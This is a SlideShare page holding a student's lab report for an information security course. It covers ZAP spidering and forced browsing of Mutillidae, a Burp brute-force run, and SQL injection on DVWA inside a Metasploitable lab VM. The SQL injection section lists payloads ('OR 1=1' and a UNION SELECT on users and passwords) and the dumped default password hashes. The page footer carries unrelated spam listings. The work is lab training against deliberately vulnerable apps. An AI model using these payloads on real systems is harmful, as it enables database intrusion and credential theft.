SlideShare a Scribd company logo
1 of 14
Download to read offline
Information Security Analysis and Audit
Lab Assessment 3
Khyati Gupta
19BIT0285
Faculty: Dr Priya V
L41+42
Question 1: In OWASP ZAP do the following:
i. Open Mutillidae through your Metasploitable IP
ii. Perform Spider attack and get the report of no of URI’s
iii. Perform Forced browse directory attack and get the report
Metasploitable IP: 192.168.56.101
(ii) Spider Attack
Therefore, no. of URLs found: 5243
(i) Mutillidae
(iii) Forced browse directory attack
Question 2: Open DVWA through your Metasploitable IP and perform the following:
A. Perform a brute force attack through Burpsite
i. Show the snapshots of proxy, positions, payloads, intercept, intruder
ii. Get the report of intruder attack
B. Perform a SQL injection to retrieve the hashed passwords of the users database
Brute Force Attack
SQL Injection
Query Used: ' OR '1'='1
Query Used: 1' and 1=1 union select user,password from users#
ID: 1' and 1=1 union select user,password from users#
First name: admin
Surname: admin
ID: 1' and 1=1 union select user,password from users#
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: 1' and 1=1 union select user,password from users#
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: 1' and 1=1 union select user,password from users#
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1' and 1=1 union select user,password from users#
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1' and 1=1 union select user,password from users#
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
Decrypting the hashed passwords
Isaa lab assessment 3

More Related Content

Similar to Isaa lab assessment 3

Refer the attached docs to understand Min 250 wordsSelect O.docx
Refer the attached docs to understand Min 250 wordsSelect O.docxRefer the attached docs to understand Min 250 wordsSelect O.docx
Refer the attached docs to understand Min 250 wordsSelect O.docx
lorent8
 
Select ONE of the following security incidents and provide the f.docx
Select ONE of the following security incidents and provide the f.docxSelect ONE of the following security incidents and provide the f.docx
Select ONE of the following security incidents and provide the f.docx
lvernon1
 
Refer  httpsnvlpubs.nist.govnistpubsLegacySPnistspecialpub.docx
Refer  httpsnvlpubs.nist.govnistpubsLegacySPnistspecialpub.docxRefer  httpsnvlpubs.nist.govnistpubsLegacySPnistspecialpub.docx
Refer  httpsnvlpubs.nist.govnistpubsLegacySPnistspecialpub.docx
lorent8
 
How Does a Data Breach Happen?
How Does a Data Breach Happen? How Does a Data Breach Happen?
How Does a Data Breach Happen?
Claranet UK
 
Read the NIST documents that I provided and Chapter 12 in your text..docx
Read the NIST documents that I provided and Chapter 12 in your text..docxRead the NIST documents that I provided and Chapter 12 in your text..docx
Read the NIST documents that I provided and Chapter 12 in your text..docx
angelicar11
 

Similar to Isaa lab assessment 3 (20)

Refer the attached docs to understand Min 250 wordsSelect O.docx
Refer the attached docs to understand Min 250 wordsSelect O.docxRefer the attached docs to understand Min 250 wordsSelect O.docx
Refer the attached docs to understand Min 250 wordsSelect O.docx
 
Select ONE of the following security incidents and provide the f.docx
Select ONE of the following security incidents and provide the f.docxSelect ONE of the following security incidents and provide the f.docx
Select ONE of the following security incidents and provide the f.docx
 
Refer  httpsnvlpubs.nist.govnistpubsLegacySPnistspecialpub.docx
Refer  httpsnvlpubs.nist.govnistpubsLegacySPnistspecialpub.docxRefer  httpsnvlpubs.nist.govnistpubsLegacySPnistspecialpub.docx
Refer  httpsnvlpubs.nist.govnistpubsLegacySPnistspecialpub.docx
 
Ntewrok secuirty cs1
Ntewrok secuirty cs1Ntewrok secuirty cs1
Ntewrok secuirty cs1
 
How Does a Data Breach Happen?
How Does a Data Breach Happen? How Does a Data Breach Happen?
How Does a Data Breach Happen?
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection Exploited
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best Practices
 
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
 
Liferay OpenShift services devcon workshop
Liferay OpenShift services  devcon workshopLiferay OpenShift services  devcon workshop
Liferay OpenShift services devcon workshop
 
SVILUPPO WEB E SICUREZZA NEL 2014
SVILUPPO WEB E SICUREZZA NEL 2014SVILUPPO WEB E SICUREZZA NEL 2014
SVILUPPO WEB E SICUREZZA NEL 2014
 
VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at c0c0n XII)
VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at c0c0n XII)VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at c0c0n XII)
VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at c0c0n XII)
 
Read the NIST documents that I provided and Chapter 12 in your text..docx
Read the NIST documents that I provided and Chapter 12 in your text..docxRead the NIST documents that I provided and Chapter 12 in your text..docx
Read the NIST documents that I provided and Chapter 12 in your text..docx
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
Database Threats - Information System Security
Database Threats - Information System SecurityDatabase Threats - Information System Security
Database Threats - Information System Security
 
VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at BSides Delh...
VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at BSides Delh...VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at BSides Delh...
VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at BSides Delh...
 
Web applications security conference slides
Web applications security  conference slidesWeb applications security  conference slides
Web applications security conference slides
 
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
Ntxissacsc5 red 1 & 2   basic hacking tools ncc groupNtxissacsc5 red 1 & 2   basic hacking tools ncc group
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
 
Watch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty ResultsWatch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty Results
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 

Recently uploaded

Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak HamilCara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Kandungan 087776558899
 
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
dharasingh5698
 
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night StandCall Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
amitlee9823
 

Recently uploaded (20)

Unleashing the Power of the SORA AI lastest leap
Unleashing the Power of the SORA AI lastest leapUnleashing the Power of the SORA AI lastest leap
Unleashing the Power of the SORA AI lastest leap
 
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
Call Girls Wakad Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Wakad Call Me 7737669865 Budget Friendly No Advance BookingCall Girls Wakad Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Wakad Call Me 7737669865 Budget Friendly No Advance Booking
 
Navigating Complexity: The Role of Trusted Partners and VIAS3D in Dassault Sy...
Navigating Complexity: The Role of Trusted Partners and VIAS3D in Dassault Sy...Navigating Complexity: The Role of Trusted Partners and VIAS3D in Dassault Sy...
Navigating Complexity: The Role of Trusted Partners and VIAS3D in Dassault Sy...
 
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak HamilCara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
 
Thermal Engineering Unit - I & II . ppt
Thermal Engineering  Unit - I & II . pptThermal Engineering  Unit - I & II . ppt
Thermal Engineering Unit - I & II . ppt
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park  6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park  6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
 
chapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringchapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineering
 
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
 
VIP Model Call Girls Kothrud ( Pune ) Call ON 8005736733 Starting From 5K to ...
VIP Model Call Girls Kothrud ( Pune ) Call ON 8005736733 Starting From 5K to ...VIP Model Call Girls Kothrud ( Pune ) Call ON 8005736733 Starting From 5K to ...
VIP Model Call Girls Kothrud ( Pune ) Call ON 8005736733 Starting From 5K to ...
 
Block diagram reduction techniques in control systems.ppt
Block diagram reduction techniques in control systems.pptBlock diagram reduction techniques in control systems.ppt
Block diagram reduction techniques in control systems.ppt
 
FEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced Loads
FEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced LoadsFEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced Loads
FEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced Loads
 
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night StandCall Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
 
Intro To Electric Vehicles PDF Notes.pdf
Intro To Electric Vehicles PDF Notes.pdfIntro To Electric Vehicles PDF Notes.pdf
Intro To Electric Vehicles PDF Notes.pdf
 
data_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdfdata_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdf
 
Bhosari ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For ...
Bhosari ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready For ...Bhosari ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready For ...
Bhosari ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For ...
 
UNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its PerformanceUNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its Performance
 
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
 

Isaa lab assessment 3

  • 1. Information Security Analysis and Audit Lab Assessment 3 Khyati Gupta 19BIT0285 Faculty: Dr Priya V L41+42
  • 2. Question 1: In OWASP ZAP do the following: i. Open Mutillidae through your Metasploitable IP ii. Perform Spider attack and get the report of no of URI’s iii. Perform Forced browse directory attack and get the report Metasploitable IP: 192.168.56.101 (ii) Spider Attack
  • 3. Therefore, no. of URLs found: 5243
  • 5. (iii) Forced browse directory attack
  • 6.
  • 7. Question 2: Open DVWA through your Metasploitable IP and perform the following: A. Perform a brute force attack through Burpsite i. Show the snapshots of proxy, positions, payloads, intercept, intruder ii. Get the report of intruder attack B. Perform a SQL injection to retrieve the hashed passwords of the users database Brute Force Attack
  • 8.
  • 9.
  • 11. Query Used: ' OR '1'='1
  • 12. Query Used: 1' and 1=1 union select user,password from users# ID: 1' and 1=1 union select user,password from users# First name: admin Surname: admin ID: 1' and 1=1 union select user,password from users# First name: admin Surname: 5f4dcc3b5aa765d61d8327deb882cf99 ID: 1' and 1=1 union select user,password from users# First name: gordonb Surname: e99a18c428cb38d5f260853678922e03 ID: 1' and 1=1 union select user,password from users# First name: 1337 Surname: 8d3533d75ae2c3966d7e0d4fcc69216b ID: 1' and 1=1 union select user,password from users# First name: pablo Surname: 0d107d09f5bbe40cade3de5c71e9e9b7 ID: 1' and 1=1 union select user,password from users# First name: smithy Surname: 5f4dcc3b5aa765d61d8327deb882cf99